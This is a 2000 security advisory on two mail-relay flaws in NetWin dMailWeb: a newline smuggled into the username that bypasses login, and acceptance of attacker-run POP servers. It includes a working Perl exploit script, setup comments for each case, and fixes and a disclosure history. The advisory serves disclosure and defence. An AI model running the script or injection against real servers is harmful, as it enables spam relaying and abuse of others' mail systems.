NetWin dMailWeb Unrestricted Mail Relay

[9cw4 () QLINK QUEENSU CA (Chris Wolfe)]

Product:      NetWin dMailWeb
Type:         Unrestricted Mail Relay
Severity:     Moderate

Versions:     <= 2.6g: Case A
              All, configuration error: Case B

Note: NetWin cwMail also appears vulnerable to the same attacks,
      and appears to be using exactly the same version numbers.

--- Overview

dMailWeb is a CGI application used to provide web-based e-mail in
collaboration with a standard POP server. Authentication is performed by
attempting to log into the requested POP server with the supplied username
password. An optional feature allows connection to POP server other than
the default (or to a limited list of POP servers).

This relaying problem appears in two cases:

Case A: By sending a specially constructed username containing a newline
character any login will be accepted and permitted to send messages through
the server. This attack does *not* require any knowledge of accounts
present on the server or a valid login.

Case B: If the dMailWeb system is allowed to authenticate with a POP server
that the attacker controls the server can have a large number of accounts
created, or simply reply OK to any username/password combination.

In both cases the attacker can circumvent the max_sends option by changing
users periodically and transmit virtually unlimited quantities of e-mail
through the default SMTP server used by the dMailWeb process. This also
presents a possible denial of service through overloading the system with
user configurations.

--- Exploit

Tested against an internal system and the NetWin demo server. The script
sends a single message; a very similar program could transfer massive
quantities of mail. (Sorry about the length)

#!/usr/local/bin/perl
use HTML::TokeParser;
use LWP::UserAgent;
use HTTP::Request::Common;

my $ua = LWP::UserAgent->new();

my $url = 'insert dmailweb URL here';

#
# To exploit case A use a $user = "any-username\nuser garbage" and
# comment out the my $pophost = ... line.
#
# To exploit case B use a $user that is valid on the $pophost server.
#

my $user = 'insert username here';
my $pass = 'insert password here';
my $pophost = 'insert pop host here';

my $to = 'insert e-mail to address';
my $subject = 'insert e-mail subject';
my $message = 'insert e-mail message';

my $r;

my $tcode;
{ # Login - read the tcode
  $r = $ua->request(GET $url);
  my $p = HTML::TokeParser->new(\$r->content);

  while (my @tok = @{$p->get_token}) {
    if ($tok[0] eq 'S' && $tok[1] eq 'input' && $tok[2]->{name} eq 'tcode') {
      $tcode = $tok[2]->{value};
      last;
    }
  }
}
if (!$tcode) { print ($r->content); exit(1); }

my $utoken;
{ # Send login, get utoken
  $r = $ua->request(POST($url, [
    cmd => 'nflogin',
    user => $user,
    pass => $pass,
    pophost => $pophost,
    tcode => $tcode
  ]));

  my $p = HTML::TokeParser->new(\$r->content);

  while (my @tok = @{$p->get_token}) {
    if ($tok[0] eq 'S' && $tok[1] eq 'input' && $tok[2]->{name} eq 'utoken') {
      $utoken = $tok[2]->{value};
      last;
    }
  }
}

{ # Send message
  $r = $ua->request(POST($url, [
    cmd => 'send',
    utoken => $utoken,
    to => $to,
    subject => $subject,
    message => $message
  ]));
}
if (!$utoken) { print ($r->content); exit(1); }

print $r->content;

--- Solution

Case A was been fixed in dMailWeb 2.6g -- this version is not currently
available but the current Beta versions (2.6i and 2.6j) also fix the
problem. I am not aware of any reasonable fix without moving to a newer
version of dMailWeb.

Case B is made possible by the default configuration of the dMailWeb
product which allows any POP server to be accessed. NetWin's documentation
is not adequate and this problem may exist on many sites. Either of

force_primary = true

valid_pop = {list of trusted POP servers}

should solve the problem. force_primary disables the pophost field in the
login form, only making it possible to connect to the default POP server at
login. valid_pop specifies a list of POP servers to which the service may
connect, others will be denied with an error message.

See: <http://www.netwinsite.com/dmailweb/dmailweb.htm>

Consider applying restrictions on the number of messages the dMailWeb
service will be permitted to send over a short period at the SMTP server,
though this would allow a denial of service attack. Monitor SMTP logs for
large numbers of messages from the server running dMailWeb.

--- History

A notification was sent to NetWin Thu, Jun 8, 2000.

On Jun 9 a response was received from NetWin requested that this
information not be released. The request was denied to pressure NetWin to
implement internal security audits and improve their documentation to a
usable state - hopefully before their luck runs out.

---

Copyright 2000, Christopher Wolfe.

Permission is granted to reproduce this advisory in a complete and
unmodified form. This advisory is provided with no warranties of any kind,
express or implied. In no event the author be liable for any damages
whatsoever arising out of or in connection with the use or spread of this
advisory or the information contained therein.

Queen's University is in no way associated with this advisory, the
information contained therein, or the actions undertake in its gathering.